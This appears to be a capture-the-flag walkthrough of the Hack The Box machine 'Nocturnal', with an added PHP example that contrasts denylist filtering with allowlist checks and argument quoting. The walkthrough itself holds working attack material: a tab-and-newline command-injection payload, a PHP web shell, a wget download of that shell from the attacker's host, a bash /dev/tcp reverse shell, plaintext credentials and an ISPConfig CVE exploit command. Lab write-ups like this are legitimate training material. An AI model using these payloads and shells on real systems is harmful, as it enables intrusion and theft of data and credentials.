Nocturnal is an easy-rated Linux machine on Hack The Box that serves as a great starting point for those looking to sharpen their basic Linux enumeration and exploitation skills. This box guides you through a series of straightforward steps involving information gathering, web enumeration, and privilege escalation, making it perfect for beginners or anyone looking to review essential penetration testing techniques.
We begin with an Nmap scan of the target to see which services it hosts.
We first scan all TCP ports, then run service version detection and the default scripts against the ports that turn out to be open.
sudo nmap --min-rate 1000 10.10.11.64 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-12 22:14 IST
Nmap scan report for 10.10.11.64
Host is up (0.35s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
sudo nmap -sVC 10.10.11.64 -p 22,80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-12 22:18 IST
Nmap scan report for 10.10.11.64
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
| 256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_ 256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan shows that accessing port 80 via the IP address results in a redirection to http://nocturnal.htb. So, let us add the domain to our /etc/hosts file.
echo '10.10.11.64 nocturnal.htb' | sudo tee -a /etc/hosts
After adding the domain name to /etc/hosts, we can browse to the machine's IP address or to http://nocturnal.htb, either of which leads us to the website hosted on our target.
Here, we see a link to register. On registering and logging in, we come across the dashboard, which contains a file upload field that takes PDF, XLSX, etc. files.
Just to check, we try uploading a random PDF file and it gets uploaded giving us a link to share our uploaded file.
On clicking the link, it leads us to the page: http://nocturnal.htb/view.php which accepts username and file parameters.
After some testing, we find that,
To send requests from a logged-in session with ffuf, we first need to get the PHPSESSID cookie using the browser's developer tools.
ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u 'http://nocturnal.htb/view.php?username=FUZZ&file=.pdf' --cookie "PHPSESSID=nscfv0c..." -fs 2985
We obtain some other users through this command: admin, amanda, tobias.
When we visit the page of amanda, we find a privacy.odt file that contains a password.
Since we have the password for amanda, we try logging in to her account and see an option to go to the Admin Panel.
The Admin Panel lets us view the content in the PHP files on the server and has an option to create a backup which even asks us for a password. Naturally, we take a look at the code in admin.php file where we might find an interesting way to exploit the backup process.
Just as we expected, at the bottom of the file, we find this code which reveals that the password field is vulnerable to command injection.
But wait, there’s a twist. The command injection would be stopped if detected by the cleanEntry function.
We intercept a backup creation request in Burp Suite and put the following value in the password field (we use a tab instead of a space and a newline instead of a semicolon, as cleanEntry filters them).
%0Abash%09-c%09"whoami"%0A%0A
Tip: If Burp Suite encodes every character and it does not work for you, you can always use: echo string | jq -sRr @uri
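Why a character denylist such as cleanEntry does not stop this, shown next to an allow-list check and argument quoting. This is an added example, not the box's admin.php: the denylist entries other than space and ';', the function names and the zip command are assumptions.

```php
<?php
// Constructed stand-in for the denylist filter described above. Only the
// space and ';' entries come from the write-up; the rest are assumed.
function denylistFilter(string $entry): ?string
{
    foreach ([';', '&', '|', '$', ' ', '`', '{', '}'] as $bad) {
        if (strpos($entry, $bad) !== false) {
            return null; // rejected
        }
    }
    return $entry;
}

// Hardened check: accept only a known-safe alphabet instead of guessing
// at dangerous characters. \A and \z anchor the whole string, so a
// trailing newline cannot slip past the way it can with $.
function allowlistFilter(string $entry): ?string
{
    return preg_match('/\A[A-Za-z0-9_.-]{8,64}\z/', $entry) === 1 ? $entry : null;
}

// Assumed backup command (zip with a password). Every variable part is
// quoted with escapeshellarg() so the shell sees it as one argument.
function backupCommand(string $password, string $archive): string
{
    return 'zip -r -P ' . escapeshellarg($password) . ' '
        . escapeshellarg($archive) . ' .';
}

// Constructed inputs: a normal password, and a harmless string that uses
// tab and newline, the two separators the denylist does not cover.
$samples = [
    'normal'      => 'Backup-2025.key',
    'tab+newline' => "x\ny\tz",
];

foreach ($samples as $label => $value) {
    printf("%-12s denylist=%s allowlist=%s\n",
        $label,
        denylistFilter($value) === null ? 'reject' : 'accept',
        allowlistFilter($value) === null ? 'reject' : 'accept');
}

// Even with validation skipped, quoting keeps the whole value inside one
// single-quoted argument, newline and tab included.
echo backupCommand($samples['tab+newline'], 'backup.zip'), "\n";
```

Passing the password through a library API such as ZipArchive instead of a shell command removes the injection surface altogether.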
The injected command runs and returns www-data as the current user. We try a few things and finally make RCE (Remote Code Execution) work as follows:
<form method="GET">
<input type="text" name="cmd" />
<input type="submit" />
</form>
<?php
// Run the command passed in the cmd query parameter
system($_GET['cmd']);
?>
python3 -m http.server
%0Abash%09-c%09"wget%09http://10.10.16.6:8000/shell.php"%0A
Finally, the shell gets downloaded and we go to http://nocturnal.htb/shell.php.
On this page, we execute the following command:
bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"
Start netcat to listen for reverse shell connection before executing the command. On our local machine terminal: nc -lvnp 4444
And Boom! We get the reverse shell.
Through the reverse shell, we go on to find the SQLite database mentioned in the register.php file. The database is located at /var/www/nocturnal_database/nocturnal_database.db.
We can go through the database using:
sqlite3 /var/www/nocturnal_database/nocturnal_database.db
And view the users table using:
select * from users;
We put these hashes in https://crackstation.net to crack them. We obtain the password for tobias from there. This same password can be used to ssh into the target machine.
sshpass -p 'slowmotionapocalypse' ssh -o StrictHostKeyChecking=no [email protected]
We find the user flag in tobias’s home directory.
As user tobias, we perform basic reconnaissance, and the netstat command reveals another service listening on port 8080.
netstat -tulnp
So, we port forward it using ssh.
sshpass -p 'slowmotionapocalypse' ssh -o StrictHostKeyChecking=no -L 8081:localhost:8080 [email protected]
Once the ssh session starts, we can visit http://localhost:8081 on our browser. This shows a login page for ISPConfig. We can log in with username admin and password that was obtained for tobias earlier.
In the help tab, we find the version of ISPConfig running. Searching for known vulnerabilities and exploits for this version turns up CVE-2023-46818, which allows PHP code injection.
We can find exploits online such as this one, through which we obtain the root flag. To use this exploit:
./exploit.sh http://127.0.0.1:8081 admin 'slowmotionapocalypse'
Remember to chmod +x exploit.sh
This gives us the root shell on nocturnal and the root flag is obtained using:
cat /root/root.txt
This wraps up the Nocturnal Machine!